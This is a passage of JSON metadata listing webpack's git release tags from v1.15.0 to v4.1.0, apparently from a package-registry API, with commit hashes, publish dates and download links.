0585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag",